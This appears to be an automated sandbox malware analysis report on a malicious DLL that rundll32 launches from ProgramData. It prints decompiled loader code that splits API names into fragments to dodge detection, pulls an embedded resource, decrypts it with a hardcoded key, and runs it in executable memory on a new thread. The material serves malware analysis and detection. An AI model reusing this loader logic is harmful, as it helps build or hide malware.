Analysis Process: rundll32.exe PID: 2328 Parent PID: 2340

General

Start time:	13:00:51
Start date:	05/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
Imagebase:	0x900000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: wermgr.exe PID: 2896 Parent PID: 2328

General

Start time:	13:00:52
Start date:	05/01/2021
Path:	C:\Windows\System32\wermgr.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\wermgr.exe
Imagebase:
File size:	50688 bytes
MD5 hash:	41DF7355A5A907E2C1D7804EC028965D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: \x041b\x0438\x0441\x04421

Declaration

Line	Content
1	Attribute VB_Name = "\x041b\x0438\x0441\x04421"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Control = "ListBox1, 2, 0, MSForms, ListBox"

Reset < >

Analysis Process: rundll32.exe PID: 2328 Parent PID: 2340 rundll32.exeCOMMON

Executed Functions

Function 10002AB0, Relevance: 37.7, APIs: 25, Instructions: 151
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E10002AB0(long _a8, signed int _a12) {
				long _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t17;
				long _t25;
				int _t32;
				long _t38;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed int _t46;
				signed int _t50;
				signed int _t51;
				void* _t54;
				void* _t56;
				long _t65;
				void* _t66;
				signed int _t76;
				void* _t77;
				signed int _t79;
				struct _OSVERSIONINFOA* _t80;
				void* _t81;

				_t15 = _a8;
				_push(_t54);
				_push(_t77);
				if(_t15 != 1) {
					__eflags = _t15;
					if(_t15 != 0) {
						__eflags = _t15 - 2;
						if(_t15 != 2) {
							__eflags = _t15 - 3;
							if(_t15 == 3) {
								E10004347(_t54, _t77, _t81, 0);
							}
							L30:
							_t17 = 1;
							__eflags = 1;
							L31:
							return _t17;
						}
						E10004070();
						_t79 = E1000762C(1, 0x214);
						__eflags = _t79;
						if(_t79 == 0) {
							L2:
							_t17 = 0;
							goto L31;
						}
						_push(_t79);
						_push( *0x10014120);
						__eflags =  *((intOrPtr*)(E10004004( *0x10015a1c)))();
						if(__eflags == 0) {
							_push(_t79);
							E1000462B(_t54, 0, _t79, __eflags);
							goto L2;
						}
						_push(0);
						_push(_t79);
						E100040D7(_t54, 0, _t79, __eflags);
						_t25 = GetCurrentThreadId();
						 *(_t79 + 4) =  *(_t79 + 4) | 0xffffffff;
						 *_t79 = _t25;
						goto L30;
					}
					__eflags =  *0x10015a00; // 0x0
					if(__eflags <= 0) {
						goto L2;
					}
					 *0x10015a00 =  *0x10015a00 - 1;
					__eflags =  *0x10015bd8; // 0x1
					if(__eflags == 0) {
						E1000631C();
					}
					__eflags = _a12;
					if(_a12 == 0) {
						E100078FF();
						E1000409A();
						E1000601B();
					}
					goto L30;
				}
				_t56 = GetProcessHeap;
				_t80 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t80 != 0) {
					_t80->dwOSVersionInfoSize = 0x94;
					_t32 = GetVersionExA(_t80);
					__eflags = _t32;
					_push(_t80);
					_push(0);
					if(_t32 != 0) {
						_a8 = _t80->dwPlatformId;
						_a12 = _t80->dwMajorVersion;
						_v8 = _t80->dwMinorVersion;
						_t76 = _t80->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t38 = _a8;
						__eflags = _t38 - 2;
						if(_t38 != 2) {
							_t76 = _t76 | 0x00008000;
							__eflags = _t76;
						}
						_t65 = _v8;
						 *0x10015b9c = _t38;
						_t39 = _a12;
						_t70 = (_t39 << 8) + _t65;
						 *0x10015ba4 = (_t39 << 8) + _t65;
						 *0x10015ba8 = _t39;
						 *0x10015bac = _t65;
						 *0x10015ba0 = _t76;
						_t40 = E10005FC1(1);
						__eflags = _t40;
						_pop(_t66);
						if(_t40 != 0) {
							_t41 = E100043B0(_t56);
							__eflags = _t41;
							if(_t41 != 0) {
								E10007DAC();
								 *0x10017638 = GetCommandLineA();
								 *0x10015a04 = E10007C77(); // executed
								_t45 = E100076BF(_t56, _t70, _t76, _t80, __eflags); // executed
								__eflags = _t45;
								if(_t45 >= 0) {
									_t46 = E10007BBE(_t66);
									__eflags = _t46;
									if(_t46 < 0) {
										L16:
										E100078FF();
										goto L11;
									}
									_t50 = E1000794B(_t66, _t70);
									__eflags = _t50;
									if(_t50 < 0) {
										goto L16;
									}
									_t51 = E100061AB(_t56, _t76, _t80, _t81, 0);
									__eflags = _t51;
									if(_t51 != 0) {
										goto L16;
									}
									 *0x10015a00 =  *0x10015a00 + 1;
									goto L30;
								}
								L11:
								E1000409A();
							}
							E1000601B();
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
					}
				}
				goto L2;
			}

0x10002ab4
0x10002aba
0x10002abb
0x10002abd
0x10002bdc
0x10002bde
0x10002c15
0x10002c18
0x10002c73
0x10002c76
0x10002c79
0x10002c7e
0x10002c7f
0x10002c81
0x10002c81
0x10002c82
0x10002c86
0x10002c86
0x10002c1a
0x10002c2b
0x10002c2d
0x10002c31
0x10002ae0
0x10002ae0
0x00000000
0x10002ae0
0x10002c37
0x10002c38
0x10002c4c
0x10002c4e
0x10002c67
0x10002c68
0x00000000
0x10002c6d
0x10002c50
0x10002c51
0x10002c52
0x10002c59
0x10002c5f
0x10002c63
0x00000000
0x10002c63
0x10002be0
0x10002be6
0x00000000
0x00000000
0x10002bec
0x10002bf2
0x10002bf8
0x10002bfa
0x10002bfa
0x10002bff
0x10002c02
0x10002c04
0x10002c09
0x10002c0e
0x10002c0e
0x00000000
0x10002c02
0x10002ac3
0x10002ada
0x10002ade
0x10002ae8
0x10002aea
0x10002af0
0x10002af2
0x10002af3
0x10002af5
0x10002b08
0x10002b0e
0x10002b14
0x10002b17
0x10002b20
0x10002b26
0x10002b29
0x10002b2c
0x10002b2e
0x10002b2e
0x10002b2e
0x10002b34
0x10002b37
0x10002b3c
0x10002b44
0x10002b48
0x10002b4e
0x10002b53
0x10002b59
0x10002b5f
0x10002b64
0x10002b66
0x10002b67
0x10002b6d
0x10002b72
0x10002b74
0x10002b80
0x10002b8b
0x10002b95
0x10002b9a
0x10002b9f
0x10002ba1
0x10002baa
0x10002baf
0x10002bb1
0x10002bd3
0x10002bd3
0x00000000
0x10002bd3
0x10002bb3
0x10002bb8
0x10002bba
0x00000000
0x00000000
0x10002bbe
0x10002bc3
0x10002bc6
0x00000000
0x00000000
0x10002bc8
0x00000000
0x10002bc8
0x10002ba3
0x10002ba3
0x10002ba3
0x10002b76
0x10002b76
0x10002af7
0x10002afa
0x10002afa
0x10002af5
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00000094,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 10002AD1
HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 10002AD4
GetVersionExA.KERNEL32(00000000,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 10002AEA
GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 10002AF7
HeapFree.KERNEL32(00000000), ref: 10002AFA
GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 10002B1D
HeapFree.KERNEL32(00000000), ref: 10002B20
__heap_term.LIBCMT ref: 10002B76
__RTC_Initialize.LIBCMT ref: 10002B80
GetCommandLineA.KERNEL32(?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 10002B85
___crtGetEnvironmentStringsA.LIBCMT ref: 10002B90
__ioinit.LIBCMT ref: 10002B9A
__mtterm.LIBCMT ref: 10002BA3
__setargv.LIBCMT ref: 10002BAA
__setenvp.LIBCMT ref: 10002BB3
__cinit.LIBCMT ref: 10002BBE
__ioterm.LIBCMT ref: 10002BD3
__ioterm.LIBCMT ref: 10002C04
__mtterm.LIBCMT ref: 10002C09
__heap_term.LIBCMT ref: 10002C0E
___set_flsgetvalue.LIBCMT ref: 10002C1A

Part of subcall function 10004070: TlsGetValue.KERNEL32 ref: 10004076
Part of subcall function 10004070: __decode_pointer.LIBCMT ref: 10004086
Part of subcall function 10004070: TlsSetValue.KERNEL32(00000000), ref: 10004093

__calloc_crt.LIBCMT ref: 10002C26

Part of subcall function 1000762C: __calloc_impl.LIBCMT ref: 1000763A
Part of subcall function 1000762C: Sleep.KERNEL32(00000000,100041C0,00000001,00000214), ref: 10007651

__decode_pointer.LIBCMT ref: 10002C44
GetCurrentThreadId.KERNEL32(?,?,00000001,?,?,10002CE2,00000001,?,?,10012970,0000000C,10002D9C,?), ref: 10002C59

Part of subcall function 1000462B: __lock.LIBCMT ref: 10004649
Part of subcall function 1000462B: ___sbh_find_block.LIBCMT ref: 10004654
Part of subcall function 1000462B: ___sbh_free_block.LIBCMT ref: 10004663
Part of subcall function 1000462B: HeapFree.KERNEL32(00000000,00000001,100129D8), ref: 10004693
Part of subcall function 1000462B: GetLastError.KERNEL32(?,1000AB65,00000004,10012D38,0000000C,1000763F,00000000,00000000,00000000,00000000,00000000,100041C0,00000001,00000214), ref: 100046A4

__freeptd.LIBCMT ref: 10002C79

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess$Value__decode_pointer__heap_term__ioterm__mtterm$AllocCommandCurrentEnvironmentErrorInitializeLastLineSleepStringsThreadVersion___crt___sbh_find_block___sbh_free_block___set_flsgetvalue__calloc_crt__calloc_impl__cinit__freeptd__ioinit__lock__setargv__setenvp
String ID:
API String ID: 2314956613-0
Opcode ID: 92b7264506977c9af08a4a5b44787a02093a751df313d0ef83277a8d3109474a
Instruction ID: 7ddc38cb4b5cc2a3e8dc1c861d5dc8d768aba7e552ead043cf8123be818b451e
Opcode Fuzzy Hash: 92b7264506977c9af08a4a5b44787a02093a751df313d0ef83277a8d3109474a
Instruction Fuzzy Hash: E341E074A443919BF721DF708C85A0F37E4FF453E1F228429F849D6199EF75E8418A22

Uniqueness

Uniqueness Score: -1.00%

Function 100018B0, Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 286
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E100018B0(void* __edi, void* __ebp) {
				signed int _v4;
				char _v8;
				void* _v12;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				void* _v56;
				char _v64;
				char _v72;
				void* _v76;
				intOrPtr _v80;
				void* _v84;
				char _v92;
				char _v96;
				char _v100;
				char _v108;
				void* _v112;
				char _v120;
				char _v128;
				char _v132;
				intOrPtr _v136;
				void* _v140;
				char _v144;
				char _v148;
				char _v156;
				char _v164;
				void* _v168;
				char _v176;
				void* _v180;
				char _v196;
				char _v204;
				intOrPtr _v208;
				char _v212;
				char _v216;
				void* _v220;
				void* _v228;
				char _v232;
				char _v236;
				char _v240;
				long _v244;
				void* __ebx;
				void* __esi;
				signed int _t97;
				CHAR* _t110;
				CHAR* _t112;
				void* _t115;
				void* _t116;
				long _t123;
				signed int _t124;
				void* _t126;
				void* _t132;
				void* _t171;
				void* _t174;
				struct HINSTANCE__* _t176;
				void* _t177;
				void* _t180;
				signed int _t185;
				void* _t188;
				void* _t189;
				signed int _t190;
				signed int _t193;

				_t171 = __edi;
				_t185 =  &_v228;
				_t97 =  *0x100140b8; // 0xa587b965
				_v4 = _t97 ^ _t185;
				_v220 = 0;
				_v228 = 0;
				_v212 = 0x17;
				_v208 = 0x1e55;
				_v204 = 0x1009;
				_v8 = 0xf;
				_v12 = 0;
				_v28 = 0;
				E100016C0( &_v32, "Ldr", 3);
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				E100016C0( &_v96, "Acces", 5);
				_v108 = 0xf;
				_v112 = 0;
				_v128 = 0;
				E100016C0( &_v132, "sResou", 6);
				_v144 = 0xf;
				_v148 = 0;
				_v164 = 0;
				E100016C0( &_v168, "rce", 3);
				_push( &_v176);
				_push( &_v148);
				_push( &_v120);
				_push( &_v64);
				_push(E10001800(__edi, __ebp,  &_v204));
				_t168 =  &_v232;
				_push(E10001800(__edi, __ebp,  &_v232));
				E10001800(__edi, __ebp,  &_v92);
				_t188 = _t185 + 0x24;
				_t194 = _v208 - 0x10;
				if(_v208 >= 0x10) {
					_push(_v196);
					L1000209E(0, __edi, 0xf, _t194);
					_t188 = _t188 + 4;
				}
				_t195 = _v148 - 0x10;
				_v176 = 0xf;
				_v180 = 0;
				_v196 = 0;
				if(_v148 >= 0x10) {
					_t168 = _v168;
					_push(_v168);
					L1000209E(0, _t171, 0xf, _t195);
					_t188 = _t188 + 4;
				}
				_push(_t171);
				_t176 = LoadLibraryA("ntdll.dll");
				_t110 = E10001050("LdrFindResource_U", 0x11);
				_t189 = _t188 + 8;
				 *0x100159d0 = GetProcAddress(_t176, _t110);
				_t112 = _v56;
				if(_v36 < 0x10) {
					_t112 =  &_v56;
				}
				 *0x100159e0 = GetProcAddress(_t176, _t112);
				_t115 = E10002AAB(0x10010198);
				_t190 = _t189 + 4;
				_t116 =  *0x100159d0( &_v212, _t115,  &_v216);
				_t177 = ShowWindow;
				ShowWindow(0, 0); // executed
				ShowWindow(0, 0); // executed
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				_t174 = 0x10000000;
				if(_t116 >= 0) {
					_t168 =  &_v244;
					 *0x100159e0(0x10000000, _v232,  &_v236,  &_v244);
				}
				if(WriteFileGather(0, 0, 0, 0, 0) == 0) {
					_t123 = E10002AAB(0x10010190);
					_t124 = E10002AAB(0x10010190);
					_t126 = VirtualAlloc(0, _v244, _t124 * E10002AAB(0x10010190), _t123); // executed
					_t180 = _t126;
					E10002180(0, _t174, _t180, _t180, _v236, _v244);
					E10001110(0, _t174, _t180, __eflags, "9&#cQk65PM*zBRtY4?5A2mxL9a4<6d>NmuW><", 0x26,  &_v240);
					_t170 =  &_v240;
					E100011B0();
					_t193 = _t190 + 0x30;
					_t132 =  *_t180(_t180, _v244,  &_v240);
					__eflags = _v52 - 0x10;
					if(__eflags >= 0) {
						_push(_v72);
						_t132 = L1000209E(0, _t174, _t180, __eflags);
						_t193 = _t193 + 4;
					}
					__eflags = _v136 - 0x10;
					_v52 = 0xf;
					_v56 = 0;
					_v72 = 0;
					if(__eflags >= 0) {
						_t170 = _v156;
						_push(_v156);
						_t132 = L1000209E(0, _t174, 0xf, __eflags);
						_t193 = _t193 + 4;
					}
					__eflags = _v108 - 0x10;
					_v136 = 0xf;
					_v140 = 0;
					_v156 = 0;
					if(__eflags >= 0) {
						_push(_v128);
						_t132 = L1000209E(0, _t174, 0xf, __eflags);
						_t193 = _t193 + 4;
					}
					__eflags = _v80 - 0x10;
					_v108 = 0xf;
					_v112 = 0;
					_v128 = 0;
					if(__eflags >= 0) {
						_push(_v100);
						_t132 = L1000209E(0, _t174, 0xf, __eflags);
						_t193 = _t193 + 4;
					}
					__eflags = _v24 - 0x10;
					_v80 = 0xf;
					_v84 = 0;
					_v100 = 0;
					if(__eflags >= 0) {
						_t170 = _v44;
						_push(_v44);
						_t132 = L1000209E(0, _t174, 0xf, __eflags);
						_t193 = _t193 + 4;
					}
					__eflags = _v20 ^ _t193;
					return E100026C4(_t132, 0, _v20 ^ _t193, _t170, _t174, 0xf);
				} else {
					_t199 = _v52 - 0x10;
					if(_v52 >= 0x10) {
						_t168 = _v72;
						_push(_v72);
						L1000209E(0, _t174, _t177, _t199);
						_t190 = _t190 + 4;
					}
					_t200 = _v136 - 0x10;
					_v52 = 0xf;
					_v56 = 0;
					_v72 = 0;
					if(_v136 >= 0x10) {
						_push(_v156);
						L1000209E(0, _t174, 0xf, _t200);
						_t190 = _t190 + 4;
					}
					_t201 = _v108 - 0x10;
					_v136 = 0xf;
					_v140 = 0;
					_v156 = 0;
					if(_v108 >= 0x10) {
						_push(_v128);
						L1000209E(0, _t174, 0xf, _t201);
						_t190 = _t190 + 4;
					}
					_t202 = _v80 - 0x10;
					_v108 = 0xf;
					_v112 = 0;
					_v128 = 0;
					if(_v80 >= 0x10) {
						_t168 = _v100;
						_push(_v100);
						L1000209E(0, _t174, 0xf, _t202);
						_t190 = _t190 + 4;
					}
					_t203 = _v24 - 0x10;
					_v80 = 0xf;
					_v84 = 0;
					_v100 = 0;
					if(_v24 >= 0x10) {
						_push(_v44);
						L1000209E(0, _t174, 0xf, _t203);
						_t190 = _t190 + 4;
					}
					return E100026C4(0, 0, _v20 ^ _t190, _t168, _t174, 0xf);
				}
			}

0x100018b0
0x100018b0
0x100018b6
0x100018bd
0x100018dc
0x100018e0
0x100018e4
0x100018ec
0x100018f4
0x100018fc
0x10001903
0x1000190a
0x10001911
0x10001924
0x1000192b
0x10001932
0x10001939
0x1000194c
0x10001953
0x1000195a
0x10001961
0x10001971
0x10001978
0x1000197c
0x10001980
0x10001989
0x10001991
0x10001999
0x100019a1
0x100019af
0x100019b0
0x100019bd
0x100019c6
0x100019d0
0x100019d3
0x100019d7
0x100019dd
0x100019de
0x100019e3
0x100019e3
0x100019e6
0x100019ea
0x100019ee
0x100019f2
0x100019f6
0x100019f8
0x100019fc
0x100019fd
0x10001a02
0x10001a02
0x10001a05
0x10001a18
0x10001a1a
0x10001a25
0x10001a33
0x10001a38
0x10001a3f
0x10001a41
0x10001a41
0x10001a4c
0x10001a5b
0x10001a60
0x10001a6e
0x10001a74
0x10001a7e
0x10001a82
0x10001a86
0x10001a8a
0x10001a8e
0x10001a92
0x10001a93
0x10001a99
0x10001aa9
0x10001aa9
0x10001abc
0x10001ba8
0x10001bb6
0x10001bd4
0x10001bde
0x10001be7
0x10001bf8
0x10001c01
0x10001c08
0x10001c0d
0x10001c10
0x10001c12
0x10001c19
0x10001c22
0x10001c23
0x10001c28
0x10001c28
0x10001c2b
0x10001c34
0x10001c3b
0x10001c42
0x10001c49
0x10001c4b
0x10001c4f
0x10001c50
0x10001c55
0x10001c55
0x10001c58
0x10001c5f
0x10001c63
0x10001c67
0x10001c6b
0x10001c74
0x10001c75
0x10001c7a
0x10001c7a
0x10001c7d
0x10001c84
0x10001c8b
0x10001c92
0x10001c99
0x10001ca2
0x10001ca3
0x10001ca8
0x10001ca8
0x10001cab
0x10001cb2
0x10001cb9
0x10001cc0
0x10001cc7
0x10001cc9
0x10001cd0
0x10001cd1
0x10001cd6
0x10001cd6
0x10001ce3
0x10001cf0
0x10001ac2
0x10001ac2
0x10001ac9
0x10001acb
0x10001ad2
0x10001ad3
0x10001ad8
0x10001ad8
0x10001adb
0x10001ae4
0x10001aeb
0x10001af2
0x10001af9
0x10001aff
0x10001b00
0x10001b05
0x10001b05
0x10001b08
0x10001b0f
0x10001b13
0x10001b17
0x10001b1b
0x10001b24
0x10001b25
0x10001b2a
0x10001b2a
0x10001b2d
0x10001b34
0x10001b3b
0x10001b42
0x10001b49
0x10001b4b
0x10001b52
0x10001b53
0x10001b58
0x10001b58
0x10001b5b
0x10001b62
0x10001b69
0x10001b70
0x10001b77
0x10001b80
0x10001b81
0x10001b86
0x10001b86
0x10001ba2
0x10001ba2

APIs

Part of subcall function 100016C0: std::_String_base::_Xlen.LIBCPMT ref: 10001719
Part of subcall function 100016C0: _memcpy_s.LIBCMT ref: 10001761

LoadLibraryA.KERNEL32(ntdll.dll), ref: 10001A0B
GetProcAddress.KERNEL32(00000000,00000000), ref: 10001A2A
GetProcAddress.KERNEL32(00000000,?), ref: 10001A4A
LdrFindResource_U.NTDLL(10000000,?,00000000,?), ref: 10001A6E
ShowWindow.USER32(00000000,00000000), ref: 10001A7E
ShowWindow.USER32(00000000,00000000), ref: 10001A82
ShowWindow.USER32(00000000,00000000), ref: 10001A86
ShowWindow.USER32(00000000,00000000), ref: 10001A8A
ShowWindow.USER32(00000000,00000000), ref: 10001A8E
LdrAccessResource.NTDLL(10000000,?,?,?), ref: 10001AA9
WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10001AB4

Part of subcall function 10002AAB: _strtol.LIBCMT ref: 10002AA2

VirtualAlloc.KERNELBASE(00000000,?,00000000,?,00000000), ref: 10001BD4

Part of subcall function 10001110: _malloc.LIBCMT ref: 10001115

Part of subcall function 100011B0: ShowWindow.USER32(00000000,00000000), ref: 1000122A
Part of subcall function 100011B0: ShowWindow.USER32(00000000,00000000), ref: 10001234

Strings

Acces, xrefs: 10001918
Ldr, xrefs: 100018D0
9&#cQk65PM*zBRtY4?5A2mxL9a4<6d>NmuW><, xrefs: 10001BF3
LdrFindResource_U, xrefs: 10001A13
sResou, xrefs: 10001940
rce, xrefs: 10001968
ntdll.dll, xrefs: 10001A06

Memory Dump Source

Source File: 00000004.00000002.2115312625.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2115298209.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115331767.0000000010010000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2115345342.0000000010014000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2115352244.0000000010018000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowWindow$AddressProc$AccessAllocFileFindGatherLibraryLoadResourceResource_String_base::_VirtualWriteXlen_malloc_memcpy_s_strtolstd::_
String ID: 9&#cQk65PM*zBRtY4?5A2mxL9a4<6d>NmuW><$Acces$Ldr$LdrFindResource_U$ntdll.dll$rce$sResou
API String ID: 913906396-3070391024
Opcode ID: 62449ef47d76c4a247ea5da1a067d3b2cba2f01861208c9d9804a774aa286ae1
Instruction ID: 742dd2ad72d40ac40570fef1d0e1be83677f9a96940bf296747f0dcd29f47432
Opcode Fuzzy Hash: 62449ef47d76c4a247ea5da1a067d3b2cba2f01861208c9d9804a774aa286ae1
Instruction Fuzzy Hash: F3B130B59093849BE330DF65CC81B9FB7E9FB84280F44491EF18957205EB75A944CB63

Uniqueness

Uniqueness Score: -1.00%

Function 001E1030, Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(001E4054), ref: 001E1047
GetProcAddress.KERNEL32(00000000), ref: 001E104E

Part of subcall function 001E1B30: SetLastError.KERNEL32(0000000D,?,001E1070,?,00000040), ref: 001E1B3D

SetLastError.KERNEL32(000000C1), ref: 001E1096

Memory Dump Source

Source File: 00000004.00000002.2112454903.00000000001E1000.00000020.00000001.sdmp, Offset: 001E1000, based on PE: false

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 75caf87475575170c91c6b8d59d25a798575704a2f8a8451bef8e86585502ddc
Instruction ID: 7a1fbf655ee69ffc7d5dcd201f22f3dd850b30660e43de788568e6898bf53540
Opcode Fuzzy Hash: 75caf87475575170c91c6b8d59d25a798575704a2f8a8451bef8e86585502ddc
Instruction Fuzzy Hash: 81F106B4E00649EFDB04DF95C984BAEB7B1BF88304F208598E915AB391D735EE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 002E1000, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
windowtimesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E002E1000() {
				_Unknown_base(*)()* _v8;
				void* _v12;
				struct tagMSG _v40;
				long _v44;
				struct HWND__* _v48;
				long _v52;
				void* _v56;
				void* _t37;
				void* _t41;
				int _t44;

				SetTimer(0, 0, 0x1f3, 0); // executed
				while(GetMessageA( &_v40, 0, 0, 0) != 0) {
					_v40.message = _v40.message + 1;
					if(_v40.message != 0x114) {
						DispatchMessageA( &_v40);
						continue;
					} else {
					}
					break;
				}
				_v12 = 0;
				_v48 = 0;
				_v52 = 0x5000;
				while(_v52 > 0x1000) {
					_v52 = _v52 - 1;
				}
				_v44 = _v52;
				while(_v44 > 0x40) {
					_v44 = _v44 - 1;
				}
				do {
					_t37 = VirtualAlloc(_v12, 0x42000, _v52, _v44); // executed
					_v8 = _t37;
					if(_v8 == 0) {
						Sleep(0x1f4);
					}
				} while (_v8 == 0);
				_v48 =  &(_v48->i);
				E002E11A0(1, _v8);
				_t41 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
				_v56 = _t41;
				SetTimer(0, 0, 0x2000, 0); // executed
				while(1) {
					_t44 = GetMessageA( &_v40, 0, 0, 0);
					if(_t44 == 0) {
						break;
					}
					_v40.message = _v40.message + 1;
					if(_v40.message == 0x114) {
						return _t44;
					}
					DispatchMessageA( &_v40);
				}
				return _t44;
			}

0x002e1011
0x002e1017
0x002e1031
0x002e103b
0x002e1043
0x00000000
0x00000000
0x002e103d
0x00000000
0x002e103b
0x002e104b
0x002e1052
0x002e1059
0x002e1060
0x002e106f
0x002e106f
0x002e1077
0x002e107a
0x002e1086
0x002e1086
0x002e108b
0x002e109c
0x002e10a2
0x002e10a9
0x002e10b0
0x002e10b0
0x002e10b6
0x002e10c2
0x002e10cb
0x002e10de
0x002e10e4
0x002e10f2
0x002e10f8
0x002e1102
0x002e110a
0x00000000
0x00000000
0x002e1112
0x002e111c
0x00000000
0x00000000
0x002e1124
0x002e1124
0x002e112f

APIs

SetTimer.USER32(00000000,00000000,000001F3,00000000), ref: 002E1011
GetMessageA.USER32 ref: 002E1021
DispatchMessageA.USER32 ref: 002E1043
VirtualAlloc.KERNELBASE(00000000,00042000,00001000,00000040), ref: 002E109C
Sleep.KERNEL32(000001F4), ref: 002E10B0
CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 002E10DE
SetTimer.USER32(00000000,00000000,00002000,00000000), ref: 002E10F2
GetMessageA.USER32 ref: 002E1102
DispatchMessageA.USER32 ref: 002E1124

Strings

@, xrefs: 002E107A

Memory Dump Source

Source File: 00000004.00000002.2112512570.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000004.00000002.2112503844.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.2112623038.0000000000315000.00000002.00000001.sdmp Download File

Similarity

API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
String ID: @
API String ID: 368155642-2766056989
Opcode ID: ee6b153c1233fcfc2e17183c6a91d35b29eed8557ae2f050c8f173056e1f3090
Instruction ID: 68d1f9753977d9792fab116f484ed0528951c4856d540348e69619747366beec
Opcode Fuzzy Hash: ee6b153c1233fcfc2e17183c6a91d35b29eed8557ae2f050c8f173056e1f3090
Instruction Fuzzy Hash: D5410770A90248EFEB14DFE1DC49BEDBA74BB48B05F608128E605BA1C0D7B56960DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0032188B, Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 404processlibraryloaderCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,00000000), ref: 00321898
GetProcAddress.KERNEL32(?,?,?,00000015), ref: 00321C08
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,?), ref: 00321DB5

Strings

QzB, xrefs: 00321A42
QzB, xrefs: 00321AD6
QzB, xrefs: 00321BE1

Memory Dump Source

Source File: 00000004.00000002.2112627940.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID: CreateProcess$AddressInternalProc
String ID: QzB$QzB$QzB
API String ID: 4011532267-2538199951
Opcode ID: 0b8f4959fede8ba51b1c5938a5a5988eff479f21d2fe0e60eeb6999d73821eb0
Instruction ID: c2437677c9358fc2caee95028fe9ae1ab877efb977913ffc45938e0d56bcae0c
Opcode Fuzzy Hash: 0b8f4959fede8ba51b1c5938a5a5988eff479f21d2fe0e60eeb6999d73821eb0
Instruction Fuzzy Hash: 01F15E74608320DFC766CF28DA95B2A77E1AFA9750F20085AF586CB360D735D884DB43

Uniqueness

Uniqueness Score: -1.00%

Function 001E14A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 001E14DB
SetLastError.KERNEL32(0000007F), ref: 001E1507

Memory Dump Source

Source File: 00000004.00000002.2112454903.00000000001E1000.00000020.00000001.sdmp, Offset: 001E1000, based on PE: false

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 23a64d7daef64c1344ffd4d49b21f1cf70c62c31f611e0666afd66dcbf7e0cc9
Instruction ID: d7e6a88f9ff8c51bec4e4da738786052aa4e4aff4b86b307f6a58c1270922c33
